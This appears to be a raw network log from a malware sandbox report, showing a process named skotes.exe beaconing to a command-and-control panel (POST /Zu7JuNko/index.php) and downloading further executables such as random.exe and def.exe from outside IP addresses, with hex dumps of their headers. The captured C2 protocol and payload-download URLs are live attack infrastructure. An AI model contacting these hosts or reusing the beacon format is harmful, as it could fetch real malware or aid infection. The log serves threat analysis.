                                                                                                                                                                                              26192.168.2.45003831.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:58.683422089 CET60OUTGET /files/flava/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:02:59.829884052 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:59 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 1834496
                                                                                                                                                                                              Last-Modified: Sat, 14 Dec 2024 21:12:38 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675df4c6-1bfe00"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYgH@H@T0h 1 H@.rsrc X@.idata 0Z@ )@\@ubvmxkob.z^@xdawalmhpH@.taggant0H"@
                                                                                                                                                                                              Dec 16, 2024 01:02:59.829910994 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:59.829929113 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:59.829946995 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:59.829982996 CET1236INData Raw: 57 89 78 bd 67 1e 96 0e b6 d0 78 09 37 d1 7a 8b 4d 4a 04 0c 1e d1 c7 ea 24 25 37 05 37 d5 7f c5 e5 84 37 49 80 91 cc 55 0b 67 fa 02 a0 31 02 7f d8 49 a8 dd ec 92 76 33 bc 5f 86 89 59 71 7d 0e 3f 85 9b 36 9c 3f 6f b9 24 6e 81 55 9c c8 e7 3f d4 79
                                                                                                                                                                                              Data Ascii: Wxgx7zMJ$%777IUg1Iv3_Yq}?6?o$nU?y'x=V:K)5uJhf?w{RG_$0IVi()~VA&T#(9}j??:XJ&Br1*wxvlwyL
                                                                                                                                                                                              Dec 16, 2024 01:02:59.830276966 CET1236INData Raw: fd 13 01 ee c4 5e d7 04 f9 5f eb da 75 42 9a ae 15 8d 1f 9c cc 4d fe 85 aa 85 3d e2 10 d2 b0 16 6c 86 59 ab c4 c4 ef 1e 54 d6 ad 6a 86 e2 81 bb b8 8f 99 a3 15 4c d5 2a 29 d6 bf 85 07 d3 82 2e 9c 48 08 22 c0 28 50 c9 ce 75 1f 77 c4 d1 81 ba 9d 8c
                                                                                                                                                                                              Data Ascii: ^_uBM=lYTjL*).H"(PuwPQBv%rtCm0bYK9S8"*^E?h=G+@!A$`z65o!jazw3wevEW=zUS
                                                                                                                                                                                              Dec 16, 2024 01:02:59.830301046 CET448INData Raw: 81 91 0c fa 95 9a 4c c4 a1 70 7a 1e 9a 76 bc 1d f6 9a 3d 47 b3 25 04 3f 61 28 98 59 80 3b a7 cc bd 25 89 7c b6 15 8f 59 fd ef ab 4c ca 89 72 99 df 2d fa bf 94 4b 8f eb 59 de ba 44 f1 27 67 01 de f2 72 a1 f3 ba cc 2b fa d6 c8 f9 ed 0a 9a 9b 70 d1
                                                                                                                                                                                              Data Ascii: Lpzv=G%?a(Y;%|YLr-KYD'gr+p(E;4~J{E~)s}FW%"d!'18\yvw_L?gaXt`yhl`u1)I^85;xFGZ$F~:L"QZB2D@
                                                                                                                                                                                              Dec 16, 2024 01:02:59.830319881 CET1236INData Raw: 7d 6b 7f 93 7a 87 f5 0e 3d 0a a1 d3 84 4a 93 eb 26 b9 52 69 d5 1d f5 0c 9f eb 81 31 9e e6 f9 c2 93 e1 04 3c f7 13 4f bb c6 21 c8 07 97 b7 78 a8 a7 61 88 7c 8d 28 fc 12 b0 0b f7 05 2b 29 ff 18 9f 84 b1 58 10 c4 1c 0d c1 e3 17 0a c0 05 13 12 bd f2
                                                                                                                                                                                              Data Ascii: }kz=J&Ri1<O!xa|(+)X_/``zAmRAgxHIs6YuN(BHKe|P&HI_z9f/UYKAjV=cAd"3E!?LJ&uu5sT'B
                                                                                                                                                                                              Dec 16, 2024 01:02:59.830338001 CET1236INData Raw: eb 32 d3 16 3f e0 de 71 f7 88 b0 9c 58 7a 03 a0 d6 69 71 59 33 6d a5 d9 26 58 b1 0b b7 57 eb 85 54 92 38 de 46 e0 7b 59 94 bf bf eb bd 41 5b 81 e5 69 a0 9a b7 cf da a2 f8 17 02 4b fa 25 a1 3a 0e 5d 82 6c f5 79 32 eb 4f fc d6 18 56 6c f8 ec 0a f9
                                                                                                                                                                                              Data Ascii: 2?qXziqY3m&XWT8F{YA[iK%:]ly2OVlGoUw/d#H|xyw*H1)&Y5FD?_"Tv,L o$z8`cT{wj{g39[-y'8n>g|(K,,E_,(1YP9XB(ef
                                                                                                                                                                                              Dec 16, 2024 01:02:59.830585003 CET1236INData Raw: 01 39 53 58 f0 c3 af 92 89 5b 52 f6 2d 69 86 2e 00 42 92 8b dc b0 c7 82 76 0e 00 3a c5 59 bc 65 f5 12 6a c4 3d fa 7f b2 08 27 c1 04 37 87 bc 6b b7 25 cf f6 bb 2b 47 ee 34 dc 9e 8a 26 10 c5 84 95 95 51 59 61 c8 30 0c e4 8e fa e3 b6 90 04 84 1e fc
                                                                                                                                                                                              Data Ascii: 9SX[R-i.Bv:Yej='7k%+G4&QYa0t9rE2"0XUEe4mm,tF4S/MFks&LrxNy6D8SsS)+2#lgH@V6S226
                                                                                                                                                                                              Dec 16, 2024 01:02:59.950304031 CET1236INData Raw: e0 53 fd 3a cf fc a7 19 80 4d 78 1d 1d 31 2e 0b 53 10 cb 66 6c 25 8b 2b 7f bc 99 18 66 89 97 76 eb 5c ef 90 eb 5b 49 82 b7 66 1a 80 07 61 21 19 31 41 e1 ed b5 a8 08 c4 b3 1a 78 07 9d ee 18 26 dd 1d b0 c3 48 a8 53 20 8b af 9a bc 9d 08 32 76 bb 29
                                                                                                                                                                                              Data Ascii: S:Mx1.Sfl%+fv\[Ifa!1Ax&HS 2v)KagZ723:KSX*w'a`_OUb#Dx.'BSQ5F}:8-A%a|Qp=n3adTH`a<!!X$@YRLaA:x'G


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              27192.168.2.450058185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:08.449721098 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015830001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:03:09.549021959 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:09 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              28192.168.2.450069185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:13.218673944 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:03:13.855386019 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:13 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              29192.168.2.450073185.215.113.1680
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:14.965197086 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080460072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:15 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 2779136
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:56:01 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6c91-2a6800"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 eb 67 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +g+`Ui` @ @.rsrc`2@.idata 8@nprvplua **:@btyxknlq *B*@.taggant@*"F*@
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080533981 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080571890 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080609083 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080645084 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080679893 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.080717087 CET776INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.242794991 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:16.242846966 CET1236INData Raw: 85 3c b8 78 61 5c 97 1d ab d5 f3 6f 74 cc c8 ac 5e de e0 e0 6f 4c a9 d8 c5 c0 9c e6 b5 f6 93 04 d8 c6 e4 80 28 92 1c c7 af 60 9e ea 28 d1 96 70 2c 1e 97 fb f5 44 79 9f 03 be b2 b8 3e 04 b1 3e 44 c7 16 f3 c2 0d 09 ff 73 11 9f 0c f0 3d 11 62 ec d4
                                                                                                                                                                                              Data Ascii: <xa\ot^oL(`(p,Dy>>Ds=b_Gz3i%#@%*XXc+&r*:#mbT*dB$(*>a'q?wZ98/.+_W%9FJ1^D^
                                                                                                                                                                                              Dec 16, 2024 01:03:16.242886066 CET1236INData Raw: 7a f6 0b ac b2 77 d2 8e 43 d9 06 7f de 15 b1 64 ec e8 9b 6d 49 0a 90 50 7f 55 d1 2c ea 68 11 62 2a df db fd 30 fd 9a 41 a5 d7 a3 43 36 ea a2 ed 81 a0 ae 1d 69 15 0a 07 83 a6 a4 31 90 63 c8 84 27 35 b8 46 91 19 84 ca 1c 21 04 3e 8b 2f 03 13 85 16
                                                                                                                                                                                              Data Ascii: zwCdmIPU,hb*0AC6i1c'5F!>/"w?0eBx)HRG$h>BVg:>0K c2n=B \\hT}!jaP>RcA.B.e8i;S\("_3_/'Hq>O)H
                                                                                                                                                                                              Dec 16, 2024 01:03:16.242923975 CET1236INData Raw: 95 de b5 1d 3c ad b8 7f 45 02 8c 8d 54 1a 35 39 7d 3f 92 23 e2 df b9 a9 e4 de 66 75 8c 7f 55 3c 36 48 97 30 92 d8 e0 f3 b5 15 6a e0 17 01 f4 7e 5d e6 83 49 4d c0 95 e7 70 e8 50 0d 2a 1d 26 d5 0e f0 a0 a8 e4 24 b0 03 c0 4d f6 13 5d 60 b2 dc 3b ba
                                                                                                                                                                                              Data Ascii: <ET59}?#fuU<6H0j~]IMpP*&$M]`;ZlaML)"(qh"5!wV"rb1hO!o?4-Cu#@Hr&.Dd'eDK]o42(%'3m"RUDu5 9C5#.
                                                                                                                                                                                              Dec 16, 2024 01:03:37.147593975 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:03:37.584455013 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:36 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 1836544
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:57:32 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6cec-1c0600"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 4e e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg*j@jN@M$a$$ $h@.rsrc$x@.idata $z@ `+$|@skauaiwmp Pb~@npkvhzbcj@.taggant0j"@


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              30192.168.2.450077185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:17.187256098 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:03:18.321625948 CET299INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:18 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 35 38 33 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 6d <c>1015831001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#<d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              31192.168.2.45008331.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:19.563239098 CET146OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              If-Modified-Since: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                              If-None-Match: "675784f0-43baf8"
                                                                                                                                                                                              Dec 16, 2024 01:03:20.423131943 CET192INHTTP/1.1 304 Not Modified
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:20 GMT
                                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675784f0-43baf8"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              32192.168.2.450094185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:27.674474001 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015831001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:03:28.753973007 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:28 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              33192.168.2.450103185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:32.073530912 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:03:33.092705011 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:32 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              34192.168.2.450111185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:36.822228909 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
